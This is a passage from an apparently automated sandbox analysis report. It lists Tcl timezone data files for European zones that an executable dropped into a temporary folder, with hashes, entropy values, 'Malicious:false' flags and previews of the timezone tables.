                                                                                                                                                                                                                                                    SHA-512:52BB9CDFD21748B8AEC93FC1D041D6AB06A2D9AEDF2E40832360A5B69C667068961BB6AF7D5B8D201786F2D083E637FF4663E3DE42DF300738B1BEF9E298834D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Rome) {. {-9223372036854775808 2996 0 LMT}. {-3259097396 2996 0 RMT}. {-2403564596 3600 0 CET}. {-1690851600 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1664758800 7200 1 CEST}. {-1649034000 3600 0 CET}. {-1635123600 7200 1 CEST}. {-1616979600 3600 0 CET}. {-1604278800 7200 1 CEST}. {-1585530000 3600 0 CET}. {-1571014800 7200 1 CEST}. {-1555290000 3600 0 CET}. {-932432400 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-804819600 3600 0 CET}. {-798080400 3600 0 CET}. {-781052400 7200 1 CEST}. {-766717200 3600 0 CET}. {-750898800 7200 1 CEST}. {-733359600 3600 0 CET}. {-719456400 7200 1 CEST}. {-701917200 3600 0 CET}. {-689209200 7200 1 CEST}. {-670460400 3600 0 CET}. {-114051600 7200 1 CEST}. {-103168800 3600 0 CET}. {-81997200 7200 1 CEST}. {-71719200 3600 0 CET

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Samara

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2143
                                                                                                                                                                                                                                                    Entropy (8bit):3.9497188371895082
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cBesH8G/kkbNcXaV/U1b7u8DmFebJRWc9sTNki/LbX8vEUe7CCUegXHnV1BQ+SbQ:Inh7bcmFnNXjTOrXn60VZb+Jg1ndgwd
                                                                                                                                                                                                                                                    MD5:E3784D1416D698E8D0F24D14B59FCF92
                                                                                                                                                                                                                                                    SHA1:E92A1D520DEC7FA11A6A70E6EAB838588C1DAAE2
                                                                                                                                                                                                                                                    SHA-256:740115A48E7C8F0E429C3FBF187563B5FB43FD8A7A7B6EC47CFA523411599876
                                                                                                                                                                                                                                                    SHA-512:C39D2D00E2D1B5C4B214A1EBBEB6DD98B2B78D1AD393A28EF74BC791735EBF7AAC3A8E95DB804CADDCFAE49A07794D12181704B1D83DFD2C33555DCCBF9DB361
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Samara) {. {-9223372036854775808 12020 0 LMT}. {-1593825620 10800 0 SAMT}. {-1247540400 14400 0 SAMT}. {-1102305600 14400 0 KUYMMTT}. {354916800 18000 1 KUYST}. {370724400 14400 0 KUYT}. {386452800 18000 1 KUYST}. {402260400 14400 0 KUYT}. {417988800 18000 1 KUYST}. {433796400 14400 0 KUYT}. {449611200 18000 1 KUYST}. {465343200 14400 0 KUYT}. {481068000 18000 1 KUYST}. {496792800 14400 0 KUYT}. {512517600 18000 1 KUYST}. {528242400 14400 0 KUYT}. {543967200 18000 1 KUYST}. {559692000 14400 0 KUYT}. {575416800 18000 1 KUYST}. {591141600 14400 0 KUYT}. {606866400 10800 0 MSD}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {638319600 14400 1 MSD}. {654649200 10800 0 MSK}. {670374000 7200 0 EEMMTT}. {670377600 10800 1 EEST}. {686102400 10800 0 KUYT}. {687916800 14400 0 SAMT}. {701809200 18000 1 SAMST}. {717530400 14400 0 SAMT}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\San_Marino

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):174
                                                                                                                                                                                                                                                    Entropy (8bit):4.908962717024613
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVvjFwFVAIgoqsuCHRLyQawELDX7x/yQax9:SlSWB9IZaM3ymx5wFVAIgoxuCxLyt/yR
                                                                                                                                                                                                                                                    MD5:C50388AD7194924572FA470761DD09C7
                                                                                                                                                                                                                                                    SHA1:EF0A2223B06BE12EFE55EE72BF2C941B7BFB2FFE
                                                                                                                                                                                                                                                    SHA-256:7F89757BAE3C7AE59200DCEEEE5C38A7F74EBAA4AA949F54AFD5E9BB64B13123
                                                                                                                                                                                                                                                    SHA-512:0CE5FF2F839CD64A2C9A5AE6BBE122C91342AE44BDECDB9A3BA9F08578BC0B474BC0AF0E773868B273423289254909A38902B225A0092D048AC44BCF883AB4B0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Rome)]} {. LoadTimeZoneFile Europe/Rome.}.set TZData(:Europe/San_Marino) $TZData(:Europe/Rome).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Sarajevo

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.890934294125181
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV/sUE2tvFVAIgoq8sUE2vqLyQawEX3GEaQahsUE2u:SlSWB9IZaM3ymhrE2tvFVAIgohrE2vqa
                                                                                                                                                                                                                                                    MD5:5C12CEEDB17515260E2E143FB8F867F5
                                                                                                                                                                                                                                                    SHA1:51B9CDF922BFBA52BF2618B63435EC510DEAE423
                                                                                                                                                                                                                                                    SHA-256:7C45DFD5F016982F01589FD2D1BAF97898D5716951A4E08C3540A76E8D56CEB1
                                                                                                                                                                                                                                                    SHA-512:7A6B7FDFD6E5CFEB2D1AC136922304B0A65362E19307E0F1E20DBF48BED95A262FAC9CBCDB015C3C744D57118A85BD47A57636A05144430BF6707404F8E53E8C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Sarajevo) $TZData(:Europe/Belgrade).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Simferopol

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2307
                                                                                                                                                                                                                                                    Entropy (8bit):3.8673720237532523
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:wMxjIJJ2JoJrsyCmh7VloiIa0QM0ScfSblniT+CC:jjInyur/hUaKln
                                                                                                                                                                                                                                                    MD5:F745F2F2FDEA14C70EA27BA35D4E3051
                                                                                                                                                                                                                                                    SHA1:C4F01A629E6BAFB31F722FA65DC92B36D4E61E43
                                                                                                                                                                                                                                                    SHA-256:EAE97716107B2BF4A14A08DD6197E0542B6EE27C3E12C726FC5BAEF16A144165
                                                                                                                                                                                                                                                    SHA-512:0E32BE79C2576943D3CB684C2E25EE3970BE7F490FF8FD41BD897249EA560F280933B26B3FBB841C67915A3427CB009A1BFC3DACD70C4F77E33664104E32033E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Simferopol) {. {-9223372036854775808 8184 0 LMT}. {-2840148984 8160 0 SMT}. {-1441160160 7200 0 EET}. {-1247536800 10800 0 MSK}. {-888894000 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-811645200 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {631141200 10800 0 MSK}. {646786800 7200 0 EET}. {694216800 7200 0 EET}. {701820000 10800 1 EEST}. {71754

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Skopje

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):182
                                                                                                                                                                                                                                                    Entropy (8bit):4.906520812033373
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV/sUE2tvFVAIgoq8sUE2vqLyQawOgpr8QahsUE2u:SlSWB9IZaM3ymhrE2tvFVAIgohrE2vq3
                                                                                                                                                                                                                                                    MD5:BB062D4D5D6EA9BA172AC0555227A09C
                                                                                                                                                                                                                                                    SHA1:75CCA7F75CEB77BE5AFB02943917DB048051F396
                                                                                                                                                                                                                                                    SHA-256:51820E2C5938CEF89A6ED2114020BD32226EF92102645526352E1CB7995B7D0A
                                                                                                                                                                                                                                                    SHA-512:8C6AD79DD225C566D2D93606575A1BF8DECF091EDFEED1F10CB41C5464A6A9F1C15BEB4957D76BD1E03F5AE430319480A3FDACEF3116EA2AF0464427468BC855
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Skopje) $TZData(:Europe/Belgrade).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Sofia

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7396
                                                                                                                                                                                                                                                    Entropy (8bit):3.6373782291014924
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:8lAV/6vcBrYixX21/BVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykePG:8lAV/SEm1/mh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                    MD5:8B538BB68A7FF0EB541EB2716264BAD9
                                                                                                                                                                                                                                                    SHA1:49899F763786D4E7324CC5BAAECFEA87D5C4F6C7
                                                                                                                                                                                                                                                    SHA-256:9D60EF4DBA6D3802CDD25DC87E00413EC7F37777868C832A9E4963E8BCDB103C
                                                                                                                                                                                                                                                    SHA-512:AD8D75EE4A484050BB108577AE16E609358A9E4F31EA1649169B4A26C8348A502B4135FE3A282A2454799250C6EDF9E70B236BCF23E1F6540E123E39E81BBE41
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Sofia) {. {-9223372036854775808 5596 0 LMT}. {-2840146396 7016 0 IMT}. {-2369527016 7200 0 EET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 3600 0 CET}. {-781048800 7200 0 EET}. {291762000 10800 0 EEST}. {307576800 7200 0 EET}. {323816400 10800 1 EEST}. {339026400 7200 0 EET}. {355266000 10800 1 EEST}. {370393200 7200 0 EET}. {386715600 10800 1 EEST}. {401846400 7200 0 EET}. {417571200 10800 1 EEST}. {433296000 7200 0 EET}. {449020800 10800 1 EEST}. {465350400 7200 0 EET}. {481075200 10800 1 EEST}. {496800000 7200 0 EET}. {512524800 10800 1 EEST}. {528249600 7200 0 EET}. {543974400 10800 1 EEST}. {559699200 7200 0 EET}. {575424000 10800 1 EEST}. {591148800 7200 0 EET}. {606873600 10800 1 EEST}. {622598400 7200 0 EET}. {638323200 10

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Stockholm

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7058
                                                                                                                                                                                                                                                    Entropy (8bit):3.730067397634837
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:K39ucRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyzF76:K3HRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:7F6C45358FC5E91125ACBDD46BBD93FE
                                                                                                                                                                                                                                                    SHA1:C07A80D3C136679751D64866B725CC390D73B750
                                                                                                                                                                                                                                                    SHA-256:119E9F7B1284462EB8E920E7216D1C219B09A73B323796BBF843346ECD71309A
                                                                                                                                                                                                                                                    SHA-512:585AE0B1DE1F5D31E45972169C831D837C19D05E21F65FAD3CB84BEF8270C31BF2F635FB803CB70C569FAC2C8AA6ABDE057943F4B51BF1D73B72695FE95ECFD2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Stockholm) {. {-9223372036854775808 4332 0 LMT}. {-2871681132 3614 0 SET}. {-2208992414 3600 0 CET}. {-1692496800 7200 1 CEST}. {-1680483600 3600 0 CET}. {315529200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {401850000 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 CET}. {638326800 7200 1 CEST}. {654656400 3600 0 CET}. {670381200 7200 1 CEST}. {686106000 3600 0 CET}. {701830800 7200 1 CEST}. {717555600 3600 0 CET}. {733280400 7200 1 CEST

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Tallinn

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7295
                                                                                                                                                                                                                                                    Entropy (8bit):3.6772204206246193
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:dcqDyurGXl6V/DraKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtk:e7GG16gh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                    MD5:981078CAEAA994DD0C088B8C4255018A
                                                                                                                                                                                                                                                    SHA1:5B5E542491FCCC80B04F6F3CA3BA76FEE35BC207
                                                                                                                                                                                                                                                    SHA-256:716CFFE58847E0084C904A01EF4230F63275660691A4BA54D0B80654E215CC8F
                                                                                                                                                                                                                                                    SHA-512:3010639D28C7363D0B787F84EF57EE30F457BD8A6A64AEDED1E813EB1AF0A8D85DA0A788C810509F932867F7361B338753CC9B79ACA95D2D32A77F7A8AA8BC9F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Tallinn) {. {-9223372036854775808 5940 0 LMT}. {-2840146740 5940 0 TMT}. {-1638322740 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1593824400 5940 0 TMT}. {-1535938740 7200 0 EET}. {-927943200 10800 0 MSK}. {-892954800 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-797648400 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 10800 1 EEST}. {622598400 7200 0 EET}. {638

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Tirane

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7412
                                                                                                                                                                                                                                                    Entropy (8bit):3.7216700074911437
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:6t1WXXRM8DAdRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQlth:6GXh9AdRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:872AB00046280F53657A47D41FBA5EFE
                                                                                                                                                                                                                                                    SHA1:311BF2342808BD9DC8AB2C2856A1F91F50CFB740
                                                                                                                                                                                                                                                    SHA-256:D02C2CD894AE4D3C2619A4249088A566B02517FA3BF65DEFAF4280C407E5B5B3
                                                                                                                                                                                                                                                    SHA-512:2FF901990FA8D6713D875F90FE611E54B35A2216C380E88D408C4FB5BD06916EE804DC6331C117C3AC643731BEADB5BDEDEA0F963B89FAEDB07CA3FFD0B3A535
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Tirane) {. {-9223372036854775808 4760 0 LMT}. {-1767230360 3600 0 CET}. {-932346000 7200 0 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-843519600 3600 0 CET}. {136854000 7200 1 CEST}. {149896800 3600 0 CET}. {168130800 7200 1 CEST}. {181432800 3600 0 CET}. {199839600 7200 1 CEST}. {213141600 3600 0 CET}. {231894000 7200 1 CEST}. {244591200 3600 0 CET}. {263257200 7200 1 CEST}. {276040800 3600 0 CET}. {294706800 7200 1 CEST}. {307490400 3600 0 CET}. {326156400 7200 1 CEST}. {339458400 3600 0 CET}. {357087600 7200 1 CEST}. {370389600 3600 0 CET}. {389142000 7200 1 CEST}. {402444000 3600 0 CET}. {419468400 7200 1 CEST}. {433807200 3600 0 CET}. {449622000 7200 1 CEST}. {457480800 7200 0 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Tiraspol

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.85845283098493
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV+NM/LpVAIgoq9NM/eO6yQa3MPgJM1p8QagNM/cn:SlSWB9IZaM3ymI6NVAIgoI6eFytM4M8g
                                                                                                                                                                                                                                                    MD5:743453106E8CD7AE48A2F575255AF700
                                                                                                                                                                                                                                                    SHA1:7CD6F6DCA61792B4B2CBF6645967B9349ECEACBE
                                                                                                                                                                                                                                                    SHA-256:C28078D4B42223871B7E1EB42EEB4E70EA0FED638288E9FDA5BB5F954D403AFB
                                                                                                                                                                                                                                                    SHA-512:458072C7660BEAFEB9AE5A2D3AEA6DA582574D80193C89F08A57B17033126E28A175F5B6E2990034660CAE3BC1E837F8312BC4AA365F426BD54588D0C5A12EB8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Chisinau)]} {. LoadTimeZoneFile Europe/Chisinau.}.set TZData(:Europe/Tiraspol) $TZData(:Europe/Chisinau).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Uzhgorod

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7287
                                                                                                                                                                                                                                                    Entropy (8bit):3.681086026612126
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:DptgbYyurZiVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEZ2:Dp4GZNh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                    MD5:E1088083B0D5570AF8FBE54A4C553AFB
                                                                                                                                                                                                                                                    SHA1:A6EC8636A0092737829B873C4879E9D4C1B0A288
                                                                                                                                                                                                                                                    SHA-256:19D87DB3DAB942037935FEC0A9A5E5FE24AFEB1E5F0F1922AF2AF2C2E186621D
                                                                                                                                                                                                                                                    SHA-512:C58AA37111AE29F85C9C3F1E52DB3C9B2E2DCEFBBB9ACA4C61AD9B00AA7F3A436E754D2285774E882614B16D5DB497ED370A06EE1AFC513579E1E5F1475CA160
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Uzhgorod) {. {-9223372036854775808 5352 0 LMT}. {-2500939752 3600 0 CET}. {-946774800 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796870800 7200 1 CEST}. {-794714400 3600 0 CET}. {-773456400 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {631141200 10800 0 MSK}. {646786800 3600 0 CET}. {670384800 7200 0 EET}. {694216800

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Vaduz

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):175
                                                                                                                                                                                                                                                    Entropy (8bit):4.906311228352029
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVnCMPwVAIgoqkCMJW6yQa1NEHp8Qa5CMP:SlSWB9IZaM3ym5XwVAIgo5PyvNEJ8jH
                                                                                                                                                                                                                                                    MD5:C1817BA53C7CD6BF007A7D1E17FBDFF1
                                                                                                                                                                                                                                                    SHA1:C72DCD724E24BBE7C22F9279B05EE03924603348
                                                                                                                                                                                                                                                    SHA-256:E000C8E2A27AE8494DC462D486DC28DAFA502F644FC1540B7B6050EABE4712DC
                                                                                                                                                                                                                                                    SHA-512:E48C1E1E60233CEC648004B6441F4A49D18D07904F88670A6F9A3DACC3006F7D7CE4A9ACB6C9B6DB8F45CB324EA1BCF6CC3DA8C1FFB40A948BB2231AC4B57EEB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Zurich)]} {. LoadTimeZoneFile Europe/Zurich.}.set TZData(:Europe/Vaduz) $TZData(:Europe/Zurich).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Vatican

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):171
                                                                                                                                                                                                                                                    Entropy (8bit):4.8663121336740405
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVvjFwFVAIgoqsuCHRLyQa1xLM1p8Qax9:SlSWB9IZaM3ymx5wFVAIgoxuCxLyvN+a
                                                                                                                                                                                                                                                    MD5:0652C9CF19CCF5C8210330B22F200D47
                                                                                                                                                                                                                                                    SHA1:052121E14825CDF98422CAA2CDD20184F184A446
                                                                                                                                                                                                                                                    SHA-256:3BC0656B5B52E3C3C6B7BC5A53F9228AAFA3EB867982CFD9332B7988687D310B
                                                                                                                                                                                                                                                    SHA-512:1880524DCA926F4BFD1972E53D5FE616DE18E4A29E9796ABEAEE4D7CD10C6FE79C0D731B305BD4DAA6FC3917B286543D622F2291B76DABA231B9B22A784C7475
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Rome)]} {. LoadTimeZoneFile Europe/Rome.}.set TZData(:Europe/Vatican) $TZData(:Europe/Rome).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Vienna

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7659
                                                                                                                                                                                                                                                    Entropy (8bit):3.7322931990772257
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:2ntWj6DmcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAT:2tWURNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:E8D0D78179D1E9D738CEEC1D0D4943E5
                                                                                                                                                                                                                                                    SHA1:E0469B86F545FFFA81CE9694C96FE30F33F745DD
                                                                                                                                                                                                                                                    SHA-256:44FF42A100EA0EB448C3C00C375F1A53614B0B5D468ADF46F2E5EAFF44F7A64C
